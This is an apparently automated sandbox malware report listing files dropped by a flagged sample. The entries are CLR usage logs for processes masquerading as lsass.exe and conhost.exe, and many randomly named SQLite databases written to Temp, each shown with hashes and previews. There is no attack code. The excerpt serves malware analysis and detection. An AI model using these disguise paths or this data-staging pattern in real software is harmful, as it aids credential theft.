                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                          MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                          SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                          SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                          SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\lsass.exe.log

                                                          Download File
                                                          Process:C:\Recovery\lsass.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):847
                                                          Entropy (8bit):5.354334472896228
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                          MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                          SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                          SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                          SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\msinto.exe.log

                                                          Download File
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1396
                                                          Entropy (8bit):5.350961817021757
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                          MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                          SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                          SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                          SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Zn0uX5K1ez.exe.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Zn0uX5K1ez.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):522
                                                          Entropy (8bit):5.358731107079437
                                                          Encrypted:false
                                                          SSDEEP:12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qpE4KlKDE4KhKiKhk
                                                          MD5:93E4C46884CB6EE7CDCC4AACE78CDFAC
                                                          SHA1:29B12D9409BA9AFE4C949F02F7D232233C0B5228
                                                          SHA-256:2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
                                                          SHA-512:E9C3E2FCEE4E13F7776665295A4F6085002913E011BEEF32C8E7065140937DDE1963182B547CC75110BF32AE5130A6686D5862076D5FFED9241F183B9217FA4D
                                                          Malicious:true
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                                          C:\Users\user\AppData\Local\Temp\0Pm77lbqFT

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\0Vly4rb0Si

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\11uhx2F3CP

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\1DxqRxk8bq

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\1Kvz5y8Ca4

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\1klv68wD2l

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\1rnGnDJLqJ

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\2ZSNH411D5

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\3XlCUqcTzr

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\45Vfev9VJv

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\4OIxrbYGAr

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\4tkQ0vq0N8

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\50jvMOzwte

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\5OLZIPm8PU

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\5QWAKoy45Q

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\5U0HZQC3zV

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\5o7cJ7Im4F

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\5sGFcDTLSn

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\668erleKw1

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
